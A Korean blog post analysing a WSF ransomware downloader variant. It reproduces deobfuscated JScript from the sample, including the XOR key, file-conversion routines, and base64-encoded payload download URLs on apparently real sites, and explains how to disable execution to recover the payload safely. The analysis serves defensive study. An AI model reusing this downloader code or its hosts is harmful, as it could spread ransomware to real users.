wsf 의 코드가 변경된 점이 확인되었다
간략히 보면
<?xml?>
<package>
<job id='JIBST'>
<script language='JScript'><![CDATA[
pereimenovalVpereimenovalPICHrodmands.create = function(){
시작해서
try{
pereimenovalVpereimenovalPICH_a2("http://"+pereimenovalVpereimenovalPICH_a5[docha].pereimenovalVpereimenovalPICH_t1() + "?vgfftDc=BJMHccMSI","hNgOkc");
}catch(pereimenovalVpereimenovalPICH_a3){}
}
]]></script></job></package>
끝나는 구조이다
코드 하단 부분을 보면
eval(cipacipa); 이 확인된다
기존처럼 콘솔로그로 변경하면 에러가 확인된다
구글검색해보니 CDATA 오류로 확인되었다
//<![CDATA[코드~~~ //]]> 으로 주석처리 하던지, 그냥 <script> 만 남기고 다 지우던지 하면 해결된다
eval(cipacipa); 디코딩 확인결과, 기존과 비슷한 MZ 로 파일 형식을 바꾸는듯한 코드가 확인된다
function pereimenovalVpereimenovalPICHrtfta(filePath)
{
var pereimenovalVpereimenovalTRADrosteks=WScript["CreateObject"]("ADODB.Stream");
pereimenovalVpereimenovalTRADrosteks["type"]=2;
pereimenovalVpereimenovalTRADrosteks["Charset"]=437;
pereimenovalVpereimenovalTRADrosteks["open"]();
pereimenovalVpereimenovalTRADrosteks["LoadFromFile"](filePath);
var fileString=pereimenovalVpereimenovalTRADrosteks["ReadText"];
pereimenovalVpereimenovalTRADrosteks["close"]();
return pereimenovalVpereimenovalPICHfsta(fileString);
};
function pereimenovalVpereimenovalPICHfsta(fileString)
{
var t1=new Array();
t1[0xC7]=0x80;t1[0xFC]=0x81;t1[0xE9]=0x82;t1[0xE2]=0x83;t1[0xE4]=0x84;t1[0xE0]=0x85;t1[0xE5]=0x86;t1[0xE7]=0x87;t1[0xEA]=0x88;t1[0xEB]=0x89;t1[0xE8]=0x8A;t1[0xEF]=0x8B;t1[0xEE]=0x8C;t1[0xEC]=0x8D;t1[0xC4]=0x8E;t1[0xC5]=0x8F;t1[0xC9]=0x90;t1[0xE6]=0x91;t1[0xC6]=0x92;t1[0xF4]=0x93;t1[0xF6]=0x94;t1[0xF2]=0x95;t1[0xFB]=0x96;t1[0xF9]=0x97;t1[0xFF]=0x98;t1[0xD6]=0x99;t1[0xDC]=0x9A;t1[0xA2]=0x9B;t1[0xA3]=0x9C;t1[0xA5]=0x9D;t1[0x20A7]=0x9E;t1[0x192]=0x9F;t1[0xE1]=0xA0;t1[0xED]=0xA1;t1[0xF3]=0xA2;t1[0xFA]=0xA3;t1[0xF1]=0xA4;t1[0xD1]=0xA5;t1[0xAA]=0xA6;t1[0xBA]=0xA7;t1[0xBF]=0xA8;t1[0x2310]=0xA9;t1[0xAC]=0xAA;t1[0xBD]=0xAB;t1[0xBC]=0xAC;t1[0xA1]=0xAD;t1[0xAB]=0xAE;t1[0xBB]=0xAF;t1[0x2591]=0xB0;t1[0x2592]=0xB1;t1[0x2593]=0xB2;t1[0x2502]=0xB3;t1[0x2524]=0xB4;t1[0x2561]=0xB5;t1[0x2562]=0xB6;t1[0x2556]=0xB7;t1[0x2555]=0xB8;t1[0x2563]=0xB9;t1[0x2551]=0xBA;t1[0x2557]=0xBB;t1[0x255D]=0xBC;t1[0x255C]=0xBD;t1[0x255B]=0xBE;t1[0x2510]=0xBF;t1[0x2514]=0xC0;t1[0x2534]=0xC1;t1[0x252C]=0xC2;t1[0x251C]=0xC3;
t1[0x2500]=0xC4;t1[0x253C]=0xC5;t1[0x255E]=0xC6;t1[0x255F]=0xC7;t1[0x255A]=0xC8;t1[0x2554]=0xC9;t1[0x2569]=0xCA;t1[0x2566]=0xCB;t1[0x2560]=0xCC;t1[0x2550]=0xCD;t1[0x256C]=0xCE;t1[0x2567]=0xCF;t1[0x2568]=0xD0;t1[0x2564]=0xD1;t1[0x2565]=0xD2;t1[0x2559]=0xD3;t1[0x2558]=0xD4;t1[0x2552]=0xD5;t1[0x2553]=0xD6;t1[0x256B]=0xD7;t1[0x256A]=0xD8;t1[0x2518]=0xD9;t1[0x250C]=0xDA;t1[0x2588]=0xDB;t1[0x2584]=0xDC;t1[0x258C]=0xDD;t1[0x2590]=0xDE;t1[0x2580]=0xDF;t1[0x3B1]=0xE0;t1[0xDF]=0xE1;t1[0x393]=0xE2;t1[0x3C0]=0xE3;t1[0x3A3]=0xE4;t1[0x3C3]=0xE5;t1[0xB5]=0xE6;t1[0x3C4]=0xE7;t1[0x3A6]=0xE8;t1[0x398]=0xE9;t1[0x3A9]=0xEA;t1[0x3B4]=0xEB;
t1[0x221E]=0xEC;t1[0x3C6]=0xED;t1[0x3B5]=0xEE;t1[0x2229]=0xEF;t1[0x2261]=0xF0;t1[0xB1]=0xF1;t1[0x2265]=0xF2;t1[0x2264]=0xF3;t1[0x2320]=0xF4;t1[0x2321]=0xF5;t1[0xF7]=0xF6;t1[0x2248]=0xF7;t1[0xB0]=0xF8;t1[0x2219]=0xF9;t1[0xB7]=0xFA;t1[0x221A]=0xFB;t1[0x207F]=0xFC;t1[0xB2]=0xFD;t1[0x25A0]=0xFE;t1[0xA0]=0xFF;
var resultArray=new Array();
for (var Tj=0; Tj < fileString["length"]; Tj++)
{
var OVc9=fileString["charCodeAt"](Tj);
if (OVc9 < 128)
{var HIi3=OVc9;}
else
{var HIi3=t1[OVc9];}
resultArray["push"](HIi3);
};
return resultArray /* y */;
};
function pereimenovalVpereimenovalPICHfats(codeArray)
{
var t2=new Array();
t2[0x80]=0x00C7;t2[0x81]=0x00FC;t2[0x82]=0x00E9;t2[0x83]=0x00E2;t2[0x84]=0x00E4;t2[0x85]=0x00E0;t2[0x86]=0x00E5;t2[0x87]=0x00E7;t2[0x88]=0x00EA;t2[0x89]=0x00EB;t2[0x8A]=0x00E8;t2[0x8B]=0x00EF;t2[0x8C]=0x00EE;t2[0x8D]=0x00EC;t2[0x8E]=0x00C4;t2[0x8F]=0x00C5;t2[0x90]=0x00C9;t2[0x91]=0x00E6;t2[0x92]=0x00C6;t2[0x93]=0x00F4;t2[0x94]=0x00F6;t2[0x95]=0x00F2;t2[0x96]=0x00FB;t2[0x97]=0x00F9;t2[0x98]=0x00FF;t2[0x99]=0x00D6;t2[0x9A]=0x00DC;t2[0x9B]=0x00A2;t2[0x9C]=0x00A3;t2[0x9D]=0x00A5;t2[0x9E]=0x20A7;t2[0x9F]=0x0192;t2[0xA0]=0x00E1;t2[0xA1]=0x00ED;t2[0xA2]=0x00F3;t2[0xA3]=0x00FA;t2[0xA4]=0x00F1;t2[0xA5]=0x00D1;t2[0xA6]=0x00AA;t2[0xA7]=0x00BA;t2[0xA8]=0x00BF;t2[0xA9]=0x2310;t2[0xAA]=0x00AC;t2[0xAB]=0x00BD;t2[0xAC]=0x00BC;t2[0xAD]=0x00A1;t2[0xAE]=0x00AB;t2[0xAF]=0x00BB;t2[0xB0]=0x2591;t2[0xB1]=0x2592;t2[0xB2]=0x2593;t2[0xB3]=0x2502;t2[0xB4]=0x2524;t2[0xB5]=0x2561;t2[0xB6]=0x2562;t2[0xB7]=0x2556;t2[0xB8]=0x2555;t2[0xB9]=0x2563;t2[0xBA]=0x2551;t2[0xBB]=0x2557;t2[0xBC]=0x255D;t2[0xBD]=0x255C;t2[0xBE]=0x255B;t2[0xBF]=0x2510;t2[0xC0]=0x2514;t2[0xC1]=0x2534;t2[0xC2]=0x252C;t2[0xC3]=0x251C;t2[0xC4]=0x2500;t2[0xC5]=0x253C;t2[0xC6]=0x255E;t2[0xC7]=0x255F;t2[0xC8]=0x255A;t2[0xC9]=0x2554;t2[0xCA]=0x2569;t2[0xCB]=0x2566;t2[0xCC]=0x2560;t2[0xCD]=0x2550;t2[0xCE]=0x256C;t2[0xCF]=0x2567;t2[0xD0]=0x2568;t2[0xD1]=0x2564;t2[0xD2]=0x2565;t2[0xD3]=0x2559;t2[0xD4]=0x2558;t2[0xD5]=0x2552;t2[0xD6]=0x2553;t2[0xD7]=0x256B;t2[0xD8]=0x256A;t2[0xD9]=0x2518;t2[0xDA]=0x250C;t2[0xDB]=0x2588;t2[0xDC]=0x2584;t2[0xDD]=0x258C;t2[0xDE]=0x2590;t2[0xDF]=0x2580;t2[0xE0]=0x03B1;t2[0xE1]=0x00DF;t2[0xE2]=0x0393;t2[0xE3]=0x03C0;t2[0xE4]=0x03A3;t2[0xE5]=0x03C3;t2[0xE6]=0x00B5;t2[0xE7]=0x03C4;t2[0xE8]=0x03A6;t2[0xE9]=0x0398;t2[0xEA]=0x03A9;t2[0xEB]=0x03B4;t2[0xEC]=0x221E;t2[0xED]=0x03C6;t2[0xEE]=0x03B5;t2[0xEF]=0x2229;t2[0xF0]=0x2261;t2[0xF1]=0x00B1;t2[0xF2]=0x2265;t2[0xF3]=0x2264;t2[0xF4]=0x2320;t2[0xF5]=0x2321;t2[0xF6]=0x00F7;t2[0xF7]=0x2248;t2[0xF8]=0x00B0;t2[0xF9]=0x2219;t2[0xFA]=0x00B7;t2[0xFB]=0x221A;t2[0xFC]=0x207F;t2[0xFD]=0x00B2;t2[0xFE]=0x25A0;t2[0xFF]=0x00A0;
var EGj=new Array();
var resultString="";
var HIi3; var OVc9;
for (var Tj=0; Tj < codeArray["length"]; Tj++)
{
HIi3=codeArray[Tj];
if (HIi3 < 128)
{OVc9=HIi3;}
else
{OVc9=t2[HIi3];}
EGj.push(String["fromCharCode"](OVc9));
}
resultString=EGj["join"]("");
return resultString;
};
function pereimenovalVpereimenovalPICHsatt(filePath, codeArray)
{
var pereimenovalVpereimenovalTRADrosteks=WScript["CreateObject"]("ADODB.Stream");
pereimenovalVpereimenovalTRADrosteks["type"]=2;
pereimenovalVpereimenovalTRADrosteks["Charset"]=437;
pereimenovalVpereimenovalTRADrosteks["open"]();
pereimenovalVpereimenovalTRADrosteks["writeText"](pereimenovalVpereimenovalPICHfats(codeArray));
pereimenovalVpereimenovalTRADrosteks["SaveToFile"](filePath, 2);
pereimenovalVpereimenovalTRADrosteks["close"]();
};
function pereimenovalVpereimenovalPICHxdac(pereimenovalVpereimenovalPICHcca)
{
for (var Tj=0; Tj < pereimenovalVpereimenovalPICHcca["length"]; Tj++)
{
pereimenovalVpereimenovalPICHcca[Tj] ^= pereimenovalVpereimenovalTRAxKey[Math.floor(Tj % pereimenovalVpereimenovalTRAxKey.length)];
}
return pereimenovalVpereimenovalPICHcca;
};
근데 URL 부분이 안보인다, 확인해보니 코드 맨 하단부분에 별도로 존재하고 있었다
base64 디코딩하면 경로가 확인된다
* 일부 URL이 살아있어 특정 주소는 생략
var pereimenovalVpereimenovalTRAxKey = pereimenovalVpereimenovalPICHfsta("uZLeHn3bGrJfKHgkCIGZhxOsgV0Io1WC");
var pereimenovalVpereimenovalPICH_a5 = ["d3d3Lm1ldGVvZXJiYS5pdC8wMmJqSkJIRHM=","c2Vpbnljby5lcy8wMmJqSkJIRHM=","d3d3LnBsYW5ldGsuaXQvMDJiakpCSERz"];
for(docha in pereimenovalVpereimenovalPICH_a5){
try{
pereimenovalVpereimenovalPICH_a2("http://"+pereimenovalVpereimenovalPICH_a5[docha].pereimenovalVpereimenovalPICH_t1() + "?생략","hNgOkc");
}catch(pereimenovalVpereimenovalPICH_a3){}
}
그럼 url 도 확인했고 다운받은 파일에 수학적 코드가 입혀지고 MZ 형태로 변경 된 후 실행을 시키는 부분을 찾아서 주석처리 하면
이미 알고 있는 %temp% 폴더에서 최종파일만 건지면 끝 !!
즉, Run 은 pereimenovalVpereimenovalPICHpromises 요놈이다
pereimenovalVpereimenovalPICHpromises 코드에 주석처리만 추가하고 .wsf 파일을 실행하면 감염없이 파일 획득이 가능하다
* 참고로 기존처럼 .js 로 바꾸고 했더니 에러가 확인되는걸 보면 .wsf 에서만 동작되는 코드가 있나보다
- 16.08.17 wsf 변종파일 확인 -
'공부 > 콤퓨타' 카테고리의 다른 글
| ImageMagick RCE (0) | 2017.03.09 |
|---|---|
| 뱅커류 패턴 변화 (0) | 2016.11.25 |
| wsf(Windows Script File) 랜섬웨어 (0) | 2016.07.14 |
| JS.Nemucod (네머코드) (0) | 2016.07.11 |
| 록키 랜섬웨어, Trojan/Win32.Locky (0) | 2016.06.29 |
